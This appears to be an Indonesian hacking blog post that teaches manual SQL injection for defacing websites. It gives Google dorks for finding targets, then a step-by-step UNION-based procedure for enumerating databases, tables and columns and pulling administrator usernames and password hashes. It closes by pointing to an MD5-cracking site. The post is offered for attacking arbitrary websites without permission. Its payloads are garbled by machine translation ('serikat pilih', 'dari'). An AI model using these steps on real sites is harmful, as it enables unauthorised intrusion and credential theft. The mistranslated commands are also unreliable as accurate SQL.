![Attacker Alone Cyber](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqJg7208Lju0KE_lqbvzytjfj3q-b9VYOo_2fMEcloiFsCOqyZNUOfWa0yfe8R1FDpbeJWajatru7jqooA1_3OaXHVAE-hd0ldXAkspy1XFAp8Q_wkvUzso9oedcDF98iJFlpvodudbdE/s320/aac.jpg" width="50" height="10">)
SQL Injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya. SQL Injection digunakan untuk berkomunikasi dengan database website
Deface SQL Injection [ Manual ]
Dorking :
- inurl:? index.php id =
- inurl:? admin.php id =
- inurl:? pages.php id =
- inurl:? pages.php id =
copy dan paste salah satu script di Google seperti inurl:? id = index.php
2. Pilih salah Satu Web
Contoh => www.target.com/index.php?id=1
3. Sekarang Anda harus menambahkan ( ') pada akhir URL
contoh => www.target.com/index.php?id=1 '
jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.
4. Sekarang kita harus mencari jumlah kolom
www.target.com/index.php?id=1 order by 10-- (ERROR)
www.target.com/index.php?id=1 order by 9-- (ERROR)
www.target.com/index.php?id=1 order by 8-- (ERROR)
www.target.com/index.php?id=1 order by 7-- (NO ERROR)
jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7
5. Sekarang kita harus menemukan kolom rentan
serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--
jika menunjukkan angka 2 kolom maka rentan adalah 2
6. kita harus menemukan versi database
www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--
Mengganti kolom rentan dengan "@@ version"
jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya
7. Sekarang menemukan nama database
serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--
ia akan menampilkan nama data base biarkan nama data base adalah "dunia"
8. Sekarang menemukan nama semua tabel
union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -
ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel
biarkan kita menemukan nama tabel "administrator"
9. Sekarang kita harus mencari nama kolom
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang ()
kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password
biarkan kita memiliki nama dua kolom user_name dan pass_word.
10. Sekarang menemukan password dari user_name
www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator
itu akan menampilkan username dan password
itu akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi
untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk